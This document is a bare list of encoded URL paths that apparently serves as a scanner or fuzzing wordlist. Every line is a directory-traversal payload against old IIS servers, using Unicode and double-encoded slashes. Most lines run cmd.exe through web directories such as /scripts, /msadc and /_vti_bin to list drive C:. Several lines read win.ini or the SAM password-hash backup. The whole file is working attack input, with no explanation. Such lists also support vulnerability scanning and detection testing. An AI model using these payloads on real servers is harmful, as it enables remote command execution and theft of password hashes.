/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini
/a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._
/a.asp/..%u00255c../..%u00255c../winnt/win.ini
/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._
/a.asp/..%u002f../..%u002f../winnt/win.ini
/a.asp/..%u002f../..%u002f..\winnt\repair\sam._
/a.asp/..%u005c../..%u005c../winnt/win.ini
/a.asp/..%u005c../..%u005c..\winnt\repair\sam._
/adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/script/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/script/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\

